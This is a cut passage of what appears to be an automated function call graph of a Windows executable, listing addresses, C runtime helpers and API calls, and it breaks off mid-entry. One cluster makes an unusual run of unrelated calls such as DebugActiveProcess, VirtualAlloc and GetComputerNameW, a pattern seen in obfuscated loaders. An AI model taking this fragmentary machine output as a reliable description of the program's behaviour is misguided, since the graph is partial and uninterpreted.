6153->7022 6156 406129 __encode_pointer 7 API calls 6157 406616 6156->6157 6158 406129 __encode_pointer 7 API calls 6157->6158 6159 406626 6158->6159 6160 406129 __encode_pointer 7 API calls 6159->6160 6161 406636 6160->6161 6162 406129 __encode_pointer 7 API calls 6161->6162 6163 406646 6162->6163 7029 4066c6 6163->7029 6166 4061a4 __decode_pointer 6 API calls 6167 406667 6166->6167 6167->6146 6168 40810e __calloc_crt 68 API calls 6167->6168 6169 406680 6168->6169 6169->6146 6170 4061a4 __decode_pointer 6 API calls 6169->6170 6171 40669a 6170->6171 6171->6146 6172 4066a1 6171->6172 6173 406290 __getptd_noexit 68 API calls 6172->6173 6174 4066a9 GetCurrentThreadId 6173->6174 6174->6151 6176 405e87 __FF_MSGBANNER 68 API calls 6175->6176 6177 403b5a 6176->6177 6178 405cdc __NMSG_WRITE 68 API calls 6177->6178 6179 403b62 6178->6179 6180 4061a4 __decode_pointer 6 API calls 6179->6180 6181 403b6d 6180->6181 6181->6051 6183 4070d6 _wparse_cmdline 6182->6183 6184 4080c9 __malloc_crt 68 API calls 6183->6184 6185 407119 _wparse_cmdline 6183->6185 6184->6185 6185->6057 7047 403c94 6186->7047 6188 403dd1 6188->6076 6190 403c94 _doexit 68 API calls 6189->6190 6191 403df7 6190->6191 6191->6079 6192->6085 6194 408117 6193->6194 6196 408154 6194->6196 6197 408135 Sleep 6194->6197 6203 4043cb 6194->6203 6196->6087 6198 40814a 6197->6198 6198->6194 6198->6196 6561 40487c 6199->6561 6201 406d51 InitializeCriticalSectionAndSpinCount 6202 406d95 __close 6201->6202 6202->6093 6204 4043d7 __close 6203->6204 6205 4043ef 6204->6205 6215 40440e _memset 6204->6215 6216 404382 6205->6216 6208 404480 RtlAllocateHeap 6208->6215 6212 404404 __close 6212->6194 6215->6208 6215->6212 6222 406842 6215->6222 6229 407de4 6215->6229 6235 4044c7 6215->6235 6238 406db4 6215->6238 6241 406377 GetLastError 6216->6241 6218 404387 6219 404856 6218->6219 6220 4061a4 __decode_pointer 6 API calls 6219->6220 6221 404866 __invoke_watson 6220->6221 6223 406857 6222->6223 6224 40686a EnterCriticalSection 6222->6224 6341 40677f 6223->6341 6224->6215 6226 40685d 6226->6224 6227 403b50 __amsg_exit 67 API calls 6226->6227 6228 406869 6227->6228 6228->6224 6231 407e12 6229->6231 6230 407eab 6233 407eb4 6230->6233 6556 4079fb 6230->6556 6231->6230 6231->6233 6549 40794b 6231->6549 6233->6215 6560 406768 LeaveCriticalSection 6235->6560 6237 4044ce 6237->6215 6239 4061a4 __decode_pointer 6 API calls 6238->6239 6240 406dc4 6239->6240 6240->6215 6255 40621f TlsGetValue 6241->6255 6243 4063e4 SetLastError 6243->6218 6245 40810e __calloc_crt 65 API calls 6246 4063a2 6245->6246 6246->6243 6260 4061a4 TlsGetValue 6246->6260 6249 4063c3 6270 406290 6249->6270 6250 4063db 6288 4081a8 6250->6288 6253 4063e1 6253->6243 6254 4063cb GetCurrentThreadId 6254->6243 6256 406234 6255->6256 6257 40624f 6255->6257 6258 4061a4 __decode_pointer 6 API calls 6256->6258 6257->6243 6257->6245 6259 40623f TlsSetValue 6258->6259 6259->6257 6261 4061bc 6260->6261 6262 4061dd GetModuleHandleW 6260->6262 6261->6262 6263 4061c6 TlsGetValue 6261->6263 6264 4061f8 GetProcAddress 6262->6264 6265 4061ed 6262->6265 6268 4061d1 6263->6268 6267 4061d5 6264->6267 6301 403b20 6265->6301 6267->6249 6267->6250 6268->6262 6268->6267 6305 40487c 6270->6305 6272 40629c GetModuleHandleW 6273 4062b2 6272->6273 6274 4062ac 6272->6274 6275 4062ca GetProcAddress GetProcAddress 6273->6275 6276 4062ee 6273->6276 6277 403b20 __crt_waiting_on_module_handle 2 API calls 6274->6277 6275->6276 6278 406842 __lock 64 API calls 6276->6278 6277->6273 6279 40630d InterlockedIncrement 6278->6279 6306 406365 6279->6306 6282 406842 __lock 64 API calls 6283 40632e 6282->6283 6309 408d2a InterlockedIncrement 6283->6309 6285 40634c 6321 40636e 6285->6321 6287 406359 __close 6287->6254 6289 4081b4 __close 6288->6289 6290 4081f3 6289->6290 6292 406842 __lock 66 API calls 6289->6292 6293 40822d __close _realloc 6289->6293 6291 408208 HeapFree 6290->6291 6290->6293 6291->6293 6294 40821a 6291->6294 6297 4081cb ___sbh_find_block 6292->6297 6293->6253 6295 404382 __close 66 API calls 6294->6295 6296 40821f GetLastError 6295->6296 6296->6293 6300 4081e5 6297->6300 6326 407635 6297->6326 6333 4081fe 6300->6333 6302 403b2b Sleep GetModuleHandleW 6301->6302 6303 403b49 6302->6303 6304 403b4d 6302->6304 6303->6302 6303->6304 6304->6264 6304->6267 6305->6272 6324 406768 LeaveCriticalSection 6306->6324 6308 406327 6308->6282 6310 408d48 InterlockedIncrement 6309->6310 6311 408d4b 6309->6311 6310->6311 6312 408d55 InterlockedIncrement 6311->6312 6313 408d58 6311->6313 6312->6313 6314 408d62 InterlockedIncrement 6313->6314 6315 408d65 6313->6315 6314->6315 6316 408d6f InterlockedIncrement 6315->6316 6318 408d72 6315->6318 6316->6318 6317 408d8b InterlockedIncrement 6317->6318 6318->6317 6319 408d9b InterlockedIncrement 6318->6319 6320 408da6 InterlockedIncrement 6318->6320 6319->6318 6320->6285 6325 406768 LeaveCriticalSection 6321->6325 6323 406375 6323->6287 6324->6308 6325->6323 6327 407674 6326->6327 6332 407916 6326->6332 6328 407860 VirtualFree 6327->6328 6327->6332 6329 4078c4 6328->6329 6330 4078d3 VirtualFree HeapFree 6329->6330 6329->6332 6336 40b0d0 6330->6336 6332->6300 6340 406768 LeaveCriticalSection 6333->6340 6335 408205 6335->6290 6337 40b0e8 6336->6337 6338 40b117 6337->6338 6339 40b10f __VEC_memcpy 6337->6339 6338->6332 6339->6338 6340->6335 6342 40678b __close 6341->6342 6343 4067b1 6342->6343 6367 405e87 6342->6367 6351 4067c1 __close 6343->6351 6413 4080c9 6343->6413 6349 4067e2 6354 406842 __lock 68 API calls 6349->6354 6350 4067d3 6353 404382 __close 68 API calls 6350->6353 6351->6226 6353->6351 6356 4067e9 6354->6356 6357 4067f1 6356->6357 6358 40681d 6356->6358 6360 406d45 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6357->6360 6359 4081a8 __mtinitlocknum 68 API calls 6358->6359 6361 40680e 6359->6361 6362 4067fc 6360->6362 6419 406839 6361->6419 6362->6361 6364 4081a8 __mtinitlocknum 68 API calls 6362->6364 6365 406808 6364->6365 6366 404382 __close 68 API calls 6365->6366 6366->6361 6422 40a68f 6367->6422 6370 405e9b 6372 405cdc __NMSG_WRITE 68 API calls 6370->6372 6374 405ebd 6370->6374 6371 40a68f __set_error_mode 68 API calls 6371->6370 6373 405eb3 6372->6373 6375 405cdc __NMSG_WRITE 68 API calls 6373->6375 6376 405cdc 6374->6376 6375->6374 6377 405cf0 6376->6377 6378 405e4b 6377->6378 6379 40a68f __set_error_mode 65 API calls 6377->6379 6410 403ba4 6378->6410 6380 405d12 6379->6380 6381 405e50 GetStdHandle 6380->6381 6383 40a68f __set_error_mode 65 API calls 6380->6383 6381->6378 6382 405e5e _strlen 6381->6382 6382->6378 6386 405e77 WriteFile 6382->6386 6384 405d23 6383->6384 6384->6381 6385 405d35 6384->6385 6385->6378 6428 40a627 6385->6428 6386->6378 6389 405d6b GetModuleFileNameA 6390 405d89 6389->6390 6396 405dac _strlen 6389->6396 6393 40a627 _strcpy_s 65 API calls 6390->6393 6394 405d99 6393->6394 6394->6396 6397 40472e __invoke_watson 10 API calls 6394->6397 6395 405def 6453 40a4fe 6395->6453 6396->6395 6444 40a572 6396->6444 6397->6396 6401 405e13 6404 40a4fe _strcat_s 65 API calls 6401->6404 6403 40472e __invoke_watson 10 API calls 6403->6401 6406 405e27 6404->6406 6405 40472e __invoke_watson 10 API calls 6405->6395 6407 405e38 6406->6407 6409 40472e __invoke_watson 10 API calls 6406->6409 6462 40a395 6407->6462 6409->6407 6515 403b79 GetModuleHandleW 6410->6515 6415 4080d2 6413->6415 6416 4067cc 6415->6416 6417 4080e9 Sleep 6415->6417 6518 40b484 6415->6518 6416->6349 6416->6350 6418 4080fe 6417->6418 6418->6415 6418->6416 6548 406768 LeaveCriticalSection 6419->6548 6421 406840 6421->6351 6423 40a69e 6422->6423 6424 405e8e 6423->6424 6425 404382 __close 68 API calls 6423->6425 6424->6370 6424->6371 6426 40a6c1 6425->6426 6427 404856 __close 6 API calls 6426->6427 6427->6424 6429 40a638 6428->6429 6430 40a63f 6428->6430 6429->6430 6435 40a665 6429->6435 6431 404382 __close 68 API calls 6430->6431 6432 40a644 6431->6432 6433 404856 __close 6 API calls 6432->6433 6434 405d57 6433->6434 6434->6389 6437 40472e 6434->6437 6435->6434 6436 404382 __close 68 API calls 6435->6436 6436->6432 6489 405a50 6437->6489 6439 40475b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6440 404837 GetCurrentProcess TerminateProcess 6439->6440 6442 40482b __invoke_watson 6439->6442 6491 405ec0 6440->6491 6442->6440 6443 404854 6443->6389 6448 40a584 6444->6448 6445 40a588 6446 405ddc 6445->6446 6447 404382 __close 68 API calls 6445->6447 6446->6395 6446->6405 6449 40a5a4 6447->6449 6448->6445 6448->6446 6451 40a5ce 6448->6451 6450 404856 __close 6 API calls 6449->6450 6450->6446 6451->6446 6452 404382 __close 68 API calls 6451->6452 6452->6449 6454 40a516 6453->6454 6457 40a50f 6453->6457 6455 404382 __close 68 API calls 6454->6455 6456 40a51b 6455->6456 6458 404856 __close 6 API calls 6456->6458 6457->6454 6460 40a54a 6457->6460 6459 405e02 6458->6459 6459->6401 6459->6403 6460->6459 6461 404382 __close 68 API calls 6460->6461 6461->6456 6500 40619b 6462->6500 6465 40a3b8 LoadLibraryA 6466 40a3cd GetProcAddress 6465->6466 6479 40a4e2 6465->6479 6468 40a3e3 6466->6468 6466->6479 6467 40a440 6471 4061a4 __decode_pointer 6 API calls 6467->6471 6484 40a46a 6467->6484 6503 406129 TlsGetValue 6468->6503 6469 4061a4 __decode_pointer 6 API calls 6469->6479 6470 4061a4 __decode_pointer 6 API calls 6480 40a4ad 6470->6480 6473 40a45d 6471->6473 6476 4061a4 __decode_pointer 6 API calls 6473->6476 6475 406129 __encode_pointer 7 API calls 6477 40a3fe GetProcAddress 6475->6477 6476->6484 6478 406129 __encode_pointer 7 API calls 6477->6478 6481 40a413 GetProcAddress 6478->6481 6479->6378 6483 4061a4 __decode_pointer 6 API calls 6480->6483 6486 40a495 6480->6486 6482 406129 __encode_pointer 7 API calls 6481->6482 6485 40a428 6482->6485 6483->6486 6484->6470 6484->6486 6485->6467 6487 40a432 GetProcAddress 6485->6487 6486->6469 6488 406129 __encode_pointer 7 API calls 6487->6488 6488->6467 6490 405a5c __VEC_memzero 6489->6490 6490->6439 6492 405ec8 6491->6492 6493 405eca IsDebuggerPresent 6491->6493 6492->6443 6499 4091b5 6493->6499 6496 40a7a7 SetUnhandledExceptionFilter UnhandledExceptionFilter 6497 40a7c4 __invoke_watson 6496->6497 6498 40a7cc GetCurrentProcess TerminateProcess 6496->6498 6497->6498 6498->6443 6499->6496 6501 406129 __encode_pointer 7 API calls 6500->6501 6502 4061a2 6501->6502 6502->6465 6502->6467 6504 406141 6503->6504 6505 406162 GetModuleHandleW 6503->6505 6504->6505 6506 40614b TlsGetValue 6504->6506 6507 406172 6505->6507 6508 40617d GetProcAddress 6505->6508 6511 406156 6506->6511 6509 403b20 __crt_waiting_on_module_handle 2 API calls 6507->6509 6510 40615a 6508->6510 6512 406178 6509->6512 6513 406195 GetProcAddress 6510->6513 6514 40618d RtlEncodePointer 6510->6514 6511->6505 6511->6510 6512->6508 6512->6513 6513->6475 6514->6513 6516 403b8d GetProcAddress 6515->6516 6517 403b9d ExitProcess 6515->6517 6516->6517 6519 40b537 6518->6519 6528 40b496 6518->6528 6520 406db4 __calloc_impl 6 API calls 6519->6520 6521 40b53d 6520->6521 6523 404382 __close 67 API calls 6521->6523 6522 405e87 __FF_MSGBANNER 67 API calls 6527 40b4a7 6522->6527 6535 40b52f 6523->6535 6524 405cdc __NMSG_WRITE 67 API calls 6524->6527 6526 40b4f3 RtlAllocateHeap 6526->6528 6527->6522 6527->6524 6527->6528 6529 403ba4 __mtinitlocknum 3 API calls 6527->6529 6528->6526 6528->6527 6530 40b523 6528->6530 6531 406db4 __calloc_impl 6 API calls 6528->6531 6533 40b528 6528->6533 6528->6535 6536 40b435 6528->6536 6529->6527 6532 404382 __close 67 API calls 6530->6532 6531->6528 6532->6533 6534 404382 __close 67 API calls 6533->6534 6534->6535 6535->6415 6537 40b441 __close 6536->6537 6538 406842 __lock 68 API calls 6537->6538 6540 40b472 __close 6537->6540 6539 40b457 6538->6539 6541 407de4 ___sbh_alloc_block 5 API calls 6539->6541 6540->6528 6542 40b462 6541->6542 6544 40b47b 6542->6544 6547 406768 LeaveCriticalSection 6544->6547 6546 40b482 6546->6540 6547->6546 6548->6421 6550 407992 HeapAlloc 6549->6550 6551 40795e HeapReAlloc 6549->6551 6553 40797c 6550->6553 6554 4079b5 VirtualAlloc 6550->6554 6552 407980 6551->6552 6551->6553 6552->6550 6553->6230 6554->6553 6555 4079cf HeapFree 6554->6555 6555->6553 6557 407a12 VirtualAlloc 6556->6557 6559 407a59 6557->6559 6559->6233 6560->6237 6561->6201 6563 40aa30 6562->6563 6564 40aa37 6562->6564 6563->6564 6569 40aa63 6563->6569 6565 404382 __close 68 API calls 6564->6565 6566 40aa3c 6565->6566 6567 404856 __close 6 API calls 6566->6567 6568 40aa4b 6567->6568 6568->6112 6569->6568 6570 404382 __close 68 API calls 6569->6570 6570->6566 6572 406a05 6571->6572 6573 406129 __encode_pointer 7 API calls 6572->6573 6574 406a1d 6572->6574 6573->6572 6574->6120 6578 406960 6575->6578 6577 4069a9 6577->6122 6579 40696c __close 6578->6579 6586 403bbc 6579->6586 6585 40698d __close 6585->6577 6587 406842 __lock 68 API calls 6586->6587 6588 403bc3 6587->6588 6589 406875 6588->6589 6590 4061a4 __decode_pointer 6 API calls 6589->6590 6591 406889 6590->6591 6592 4061a4 __decode_pointer 6 API calls 6591->6592 6593 406899 6592->6593 6594 40691c 6593->6594 6609 40a8d4 6593->6609 6606 406996 6594->6606 6596 406903 6597 406129 __encode_pointer 7 API calls 6596->6597 6598 406911 6597->6598 6602 406129 __encode_pointer 7 API calls 6598->6602 6599 4068db 6599->6594 6603 40815a __realloc_crt 74 API calls 6599->6603 6604 4068f1 6599->6604 6600 4068b7 6600->6596 6600->6599 6622 40815a 6600->6622 6602->6594 6603->6604 6604->6594 6605 406129 __encode_pointer 7 API calls 6604->6605 6605->6596 6671 403bc5 6606->6671 6610 40a8e0 __close 6609->6610 6611 40a8f0 6610->6611 6612 40a90d 6610->6612 6613 404382 __close 68 API calls 6611->6613 6614 40a94e HeapSize 6612->6614 6616 406842 __lock 68 API calls 6612->6616 6615 40a8f5 6613->6615 6618 40a905 __close 6614->6618 6617 404856 __close 6 API calls 6615->6617 6619 40a91d ___sbh_find_block 6616->6619 6617->6618 6618->6600 6627 40a96e 6619->6627 6626 408163 6622->6626 6624 4081a2 6624->6599 6625 408183 Sleep 6625->6626 6626->6624 6626->6625 6631 40b54e 6626->6631 6630 406768 LeaveCriticalSection 6627->6630 6629 40a949 6629->6614 6629->6618 6630->6629 6632 40b55a __close 6631->6632 6633 40b561 6632->6633 6634 40b56f 6632->6634 6635 40b484 _malloc 68 API calls 6633->6635 6636 40b582 6634->6636 6637 40b576 6634->6637 6653 40b569 __close _realloc 6635->6653 6644 40b6f4 6636->6644 6664 40b58f ___sbh_resize_block _realloc ___sbh_find_block 6636->6664 6638 4081a8 __mtinitlocknum 68 API calls 6637->6638 6638->6653 6639 40b727 6640 406db4 __calloc_impl 6 API calls 6639->6640 6643 40b72d 6640->6643 6641 406842 __lock 68 API calls 6641->6664 6642 40b6f9 HeapReAlloc 6642->6644 6642->6653 6645 404382 __close 68 API calls 6643->6645 6644->6639 6644->6642 6646 40b74b 6644->6646 6647 406db4 __calloc_impl 6 API calls 6644->6647 6650 40b741 6644->6650 6645->6653 6648 404382 __close 68 API calls 6646->6648 6646->6653 6647->6644 6651 40b754 GetLastError 6648->6651 6652 404382 __close 68 API calls 6650->6652 6651->6653 6655 40b6c2 6652->6655 6653->6626 6654 40b61a HeapAlloc 6654->6664 6655->6653 6657 40b6c7 GetLastError 6655->6657 6656 40b66f HeapReAlloc 6656->6664 6657->6653 6658 407de4 ___sbh_alloc_block 5 API calls 6658->6664 6659 40b6da 6659->6653 6661 404382 __close 68 API calls 6659->6661 6660 406db4 __calloc_impl 6 API calls 6660->6664 6662 40b6e7 6661->6662 6662->6651 6662->6653 6663 40b6bd 6665 404382 __close 68 API calls 6663->6665 6664->6639 6664->6641 6664->6653 6664->6654 6664->6656 6664->6658 6664->6659 6664->6660 6664->6663 6666 407635 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6664->6666 6667 40b692 6664->6667 6665->6655 6666->6664 6670 406768 LeaveCriticalSection 6667->6670 6669 40b699 6669->6664 6670->6669 6674 406768 LeaveCriticalSection 6671->6674 6673 403bcc 6673->6585 6674->6673 6676 4043cb __calloc_impl 68 API calls 6675->6676 6677 40396e 6676->6677 6678 402b22 6677->6678 6679 404382 __close 68 API calls 6677->6679 6678->6130 6680 403981 6679->6680 6680->6678 6681 404382 __close 68 API calls 6680->6681 6681->6678 6683 402996 6682->6683 6684 4029ae GetModuleHandleA GetProcAddress 6682->6684 6700 403b0a 6683->6700 6686 4029e4 6684->6686 6703 4028be LoadLibraryA GetProcAddress 6686->6703 6687 40299e 6689 403dc0 68 API calls 6687->6689 6689->6684 6690 4029ee 6691 402a1f GetCurrentThreadId VirtualAlloc ReadConsoleA 6690->6691 6692 402a49 6690->6692 6691->6690 6705 402834 6692->6705 6694 402a4e 6695 402a73 SetConsoleDisplayMode LockResource 6694->6695 6696 402a93 6694->6696 6695->6694 6697 402aa5 GetComputerNameW SetThreadExecutionState TlsSetValue 6696->6697 6698 402ac8 LoadLibraryW 6696->6698 6697->6696 6699 402ad8 6698->6699 6699->6133 6710 4060fe 6700->6710 6704 402971 6703->6704 6704->6690 6706 40289f 6705->6706 6707 402852 6705->6707 6706->6694 6707->6706 6708 402864 GetProcessWorkingSetSize WriteConsoleW LCMapStringA DebugActiveProcess 6707->6708 7016 4026cf 6707->7016 6708->6707 6711 406117 6710->6711 6714 405ecf 6711->6714 6726 404698 6714->6726 6716 405ef6 6718 404382 __close 68 API calls 6716->6718 6719 405efb 6718->6719 6720 404856 __close 6 API calls 6719->6720 6723 403b1b 6720->6723 6722 405f33 6724 405f78 6722->6724 6734 40a7e0 6722->6734 6723->6687 6724->6723 6725 404382 __close 68 API calls 6724->6725 6725->6723 6727 4046ab 6726->6727 6733 4046f8 6726->6733 6741 4063f0 6727->6741 6730 4046d8 6730->6733 6761 408724 6730->6761 6733->6716 6733->6722 6735 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6734->6735 6736 40a7f4 6735->6736 6740 40a801 6736->6740 6949 4090cc 6736->6949 6740->6722 6742 406377 __getptd_noexit 68 API calls 6741->6742 6743 4063f8 6742->6743 6744 4046b0 6743->6744 6745 403b50 __amsg_exit 68 API calls 6743->6745 6744->6730 6746 408e90 6744->6746 6745->6744 6747 408e9c __close 6746->6747 6748 4063f0 __getptd 68 API calls 6747->6748 6749 408ea1 6748->6749 6750 408ecf 6749->6750 6752 408eb3 6749->6752 6751 406842 __lock 68 API calls 6750->6751 6753 408ed6 6751->6753 6754 4063f0 __getptd 68 API calls 6752->6754 6777 408e52 6753->6777 6756 408eb8 6754->6756 6759 408ec6 __close 6756->6759 6760 403b50 __amsg_exit 68 API calls 6756->6760 6759->6730 6760->6759 6762 408730 __close 6761->6762 6763 4063f0 __getptd 68 API calls 6762->6763 6764 408735 6763->6764 6765 408747 6764->6765 6766 406842 __lock 68 API calls 6764->6766 6768 408755 __close 6765->6768 6770 403b50 __amsg_exit 68 API calls 6765->6770 6767 408765 6766->6767 6769 4087ae 6767->6769 6772 408796 InterlockedIncrement 6767->6772 6773 40877c InterlockedDecrement 6767->6773 6768->6733 6945 4087bf 6769->6945 6770->6768 6772->6769 6773->6772 6774 408787 6773->6774 6774->6772 6775 4081a8 __mtinitlocknum 68 API calls 6774->6775 6776 408795 6775->6776 6776->6772 6778 408e56 6777->6778 6784 408e88 6777->6784 6779 408d2a ___addlocaleref 8 API calls 6778->6779 6778->6784 6780 408e69 6779->6780 6780->6784 6788 408db9 6780->6788 6785 408efa 6784->6785 6944 406768 LeaveCriticalSection 6785->6944 6787 408f01 6787->6756 6789 408dca InterlockedDecrement 6788->6789 6790 408e4d 6788->6790 6791 408de2 6789->6791 6792 408ddf InterlockedDecrement 6789->6792 6790->6784 6802 408be1 6790->6802 6793 408dec InterlockedDecrement 6791->6793 6794 408def 6791->6794 6792->6791 6793->6794 6795 408df9 InterlockedDecrement 6794->6795 6796 408dfc 6794->6796 6795->6796 6797 408e06 InterlockedDecrement 6796->6797 6799 408e09 6796->6799 6797->6799 6798 408e22 InterlockedDecrement 6798->6799 6799->6798 6800 408e3d InterlockedDecrement 6799->6800 6801 408e32 InterlockedDecrement 6799->6801 6800->6790 6801->6799 6803 408c65 6802->6803 6812 408bf8 6802->6812 6804 4081a8 __mtinitlocknum 68 API calls 6803->6804 6805 408cb2 6803->6805 6806 408c86 6804->6806 6819 408cd9 6805->6819 6856 40c732 6805->6856 6808 4081a8 __mtinitlocknum 68 API calls 6806->6808 6813 408c99 6808->6813 6809 408c2c 6810 408c4d 6809->6810 6823 4081a8 __mtinitlocknum 68 API calls 6809->6823 6814 4081a8 __mtinitlocknum 68 API calls 6810->6814 6812->6803 6812->6809 6817 4081a8 __mtinitlocknum 68 API calls 6812->6817 6821 4081a8 __mtinitlocknum 68 API calls 6813->6821 6824 408c5a 6814->6824 6815 408d1e 6818 4081a8 __mtinitlocknum 68 API calls 6815->6818 6816 4081a8 __mtinitlocknum 68 API calls 6816->6819 6820 408c21 6817->6820 6825 408d24 6818->6825 6819->6815 6822 4081a8 68 API calls __mtinitlocknum 6819->6822 6832 40c90c 6820->6832 6827 408ca7 6821->6827 6822->6819 6828 408c42 6823->6828 6829 4081a8 __mtinitlocknum 68 API calls 6824->6829 6825->6784 6830 4081a8 __mtinitlocknum 68 API calls 6827->6830 6848 40c8c7 6828->6848 6829->6803 6830->6805 6833 40c919 6832->6833 6847 40c996 6832->6847 6834 40c92a 6833->6834 6836 4081a8 __mtinitlocknum 68 API calls 6833->6836 6835 40c93c 6834->6835 6837 4081a8 __mtinitlocknum 68 API calls 6834->6837 6838 40c94e 6835->6838 6839 4081a8 __mtinitlocknum 68 API calls 6835->6839 6836->6834 6837->6835 6840 4081a8 __mtinitlocknum 68 API calls 6838->6840 6841 40c960 6838->6841 6839->6838 6840->6841 6843 40c972 6841->6843 6844 4081a8 __mtinitlocknum 68 API calls 6841->6844 6842 40c984 6846 4081a8 __mtinitlocknum 68 API calls 6842->6846 6842->6847 6843->6842 6845 4081a8 __mtinitlocknum 68 API calls 6843->6845 6844->6843 6845->6842 6846->6847 6847->6809 6849 40c8d4 6848->6849 6855 40c908 6848->6855 6850 40c8e4 6849->6850 6851 4081a8 __mtinitlocknum 68 API calls 6849->6851 6852 4081a8 __mtinitlocknum 68 API calls 6850->6852 6853 40c8f6 6850->6853 6851->6850 6852->6853 6854 4081a8 __mtinitlocknum 68 API calls 6853->6854 6853->6855 6854->6855 6855->6810 6857 40c743 6856->6857 6943 408cd2 6856->6943 6858 4081a8 __mtinitlocknum 68 API calls 6857->6858 6859 40c74b 6858->6859 6860 4081a8 __mtinitlocknum 68 API calls 6859->6860 6861 40c753 6860->6861 6862 4081a8 __mtinitlocknum 68 API calls 6861->6862 6863 40c75b 6862->6863 6864 4081a8 __mtinitlocknum 68 API calls 6863->6864 6865 40c763 6864->6865 6866 4081a8 __mtinitlocknum 68 API calls 6865->6866 6867 40c76b 6866->6867 6868 4081a8 __mtinitlocknum 68 API calls 6867->6868 6869 40c773 6868->6869 6870 4081a8 __mtinitlocknum 68 API calls 6869->6870 6871 40c77a 6870->6871 6872 4081a8 __mtinitlocknum 68 API calls 6871->6872 6873 40c782 6872->6873 6874 4081a8 __mtinitlocknum 68 API calls 6873->6874 6875 40c78a 6874->6875 6876 4081a8 __mtinitlocknum 68 API calls 6875->6876 6877 40c792 6876->6877 6878 4081a8 __mtinitlocknum 68 API calls 6877->6878 6879 40c79a 6878->6879 6880 4081a8 __mtinitlocknum 68 API calls 6879->6880 6881 40c7a2 6880->6881 6882 4081a8 __mtinitlocknum 68 API calls 6881->6882 6883 40c7aa 6882->6883 6884 4081a8 __mtinitlocknum 68 API calls 6883->6884 6885 40c7b2 6884->6885 6886 4081a8 __mtinitlocknum 68 API calls 6885->6886 6887 40c7ba 6886->6887 6888 4081a8 __mtinitlocknum 68 API calls 6887->6888 6889 40c7c2 6888->6889 6890 4081a8 __mtinitlocknum 68 API calls 6889->6890 6891 40c7cd 6890->6891 6892 4081a8 __mtinitlocknum 68 API calls 6891->6892 6893 40c7d5 6892->6893 6894 4081a8 __mtinitlocknum 68 API calls 6893->6894 6895 40c7dd 6894->6895 6896 4081a8 __mtinitlocknum 68 API calls 6895->6896 6897 40c7e5 6896->6897 6898 4081a8 __mtinitlocknum 68 API calls 6897->6898 6899 40c7ed 6898->6899 6900 4081a8 __mtinitlocknum 68 API calls 6899->6900 6901 40c7f5 6900->6901 6902 4081a8 __mtinitlocknum 68 API calls 6901->6902 6903 40c7fd 6902->6903 6904 4081a8 __mtinitlocknum 68 API calls 6903->6904 6905 40c805 6904->6905 6906 4081a8 __mtinitlocknum 68 API calls 6905->6906 6907 40c80d 6906->6907 6908 4081a8 __mtinitlocknum 68 API calls 6907->6908 6909 40c815 6908->6909 6910 4081a8 __mtinitlocknum 68 API calls 6909->6910 6911 40c81d 6910->6911 6912 4081a8 __mtinitlocknum 68 API calls 6911->6912 6913 40c825 6912->6913 6914 4081a8 __mtinitlocknum 68 API calls 6913->6914 6915 40c82d 6914->6915 6916 4081a8 __mtinitlocknum 68 API calls 6915->6916 6917 40c835 6916->6917 6918 4081a8 __mtinitlocknum 68 API calls 6917->6918 6919 40c83d 6918->6919 6920 4081a8 __mtinitlocknum 68 API calls 6919->6920 6921 40c845 6920->6921 6922 4081a8 __mtinitlocknum 68 API calls 6921->6922 6923 40c853 6922->6923 6924 4081a8 __mtinitlocknum 68 API calls 6923->6924 6925 40c85e 6924->6925 6926 4081a8 __mtinitlocknum 68 API calls 6925->6926 6927 40c869 6926->6927 6928 4081a8 __mtinitlocknum 68 API calls 6927->6928 6929 40c874 6928->6929 6930 4081a8 __mtinitlocknum 68 API calls 6929->6930 6931 40c87f 6930->6931 6932 4081a8 __mtinitlocknum 68 API calls 6931->6932 6933 40c88a 6932->6933 6934 4081a8 __mtinitlocknum 68 API calls 6933->6934 6935 40c895 6934->6935 6936 4081a8 __mtinitlocknum 68 API calls 6935->6936 6937 40c8a0 6936->6937 6938 4081a8 __mtinitlocknum 68 API calls 6937->6938 6939 40c8ab 6938->6939 6940 4081a8 __mtinitlocknum 68 API calls 6939->6940 6941 40c8b6 6940->6941 6942 4081a8 __mtinitlocknum 68 API calls 6941->6942 6942->6943 6943->6816 6944->6787 6948 406768 LeaveCriticalSection 6945->6948 6947 4087c6 6947->6765 6948->6947 6950 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6949->6950 6951 4090df 6950->6951 6952 40c6f0 6951->6952 6953 404698 _LocaleUpdate::_LocaleUpdate 78 API calls 6952->6953 6954 40c703 6953->6954 6957 40c536 6954->6957 6958 40c557 GetStringTypeW 6957->6958 6962 40c582 6957->6962 6959 40c577 GetLastError 6958->6959 6960 40c56f 6958->6960 6959->6962 6963 40c5bb MultiByteToWideChar 6960->6963 6979 40c663 6960->6979 6961 40c669 6985 40d99f GetLocaleInfoA 6961->6985 6962->6960 6962->6961 6969 40c5e8 6963->6969 6963->6979 6965 405ec0 setSBUpLow 5 API calls 6967 40c6ee 6965->6967 6967->6740 6968 40c6ba GetStringTypeA 6974 40c6d5 6968->6974 6968->6979 6970 40c5fd _memset __alloca_probe_16 6969->6970 6971 40b484 _malloc 68 API calls 6969->6971 6973 40c636 MultiByteToWideChar 6970->6973 6970->6979 6971->6970 6977 40c64c GetStringTypeW 6973->6977 6978 40c65d 6973->6978 6975 4081a8 __mtinitlocknum 68 API calls 6974->6975 6975->6979 6977->6978 6981 40a9ff 6978->6981 6979->6965 6982 40aa0b 6981->6982 6983 40aa1c 6981->6983 6982->6983 6984 4081a8 __mtinitlocknum 68 API calls 6982->6984 6983->6979 6984->6983 6986 40d9d2 6985->6986 6987 40d9cd 6985->6987 6988 403b0a ___ansicp 91 API calls 6986->6988 6989 405ec0 setSBUpLow 5 API calls 6987->6989 6988->6987 6990 40c68d 6989->6990 6990->6968 6990->6979 6991 40d9e8 6990->6991 6992 40da28 GetCPInfo 6991->6992 6996 40dab2 6991->6996 6993 40da9d MultiByteToWideChar 6992->6993 6994 40da3f 6992->6994 6993->6996 7000 40da58 _strlen 6993->7000 6994->6993 6997 40da45 GetCPInfo 6994->6997 6995 405ec0 setSBUpLow 5 API calls 6998 40c6ae 6995->6998 6996->6995 6997->6993 6999 40da52 6997->6999 6998->6968 6998->6979 6999->6993 6999->7000 7001 40b484 _malloc 68 API calls 7000->7001 7003 40da8a _memset __alloca_probe_16 7000->7003 7001->7003 7002 40dae7 MultiByteToWideChar 7004 40db1e 7002->7004 7005 40daff 7002->7005 7003->6996 7003->7002 7006 40a9ff __freea 68 API calls 7004->7006 7007 40db23 7005->7007 7008 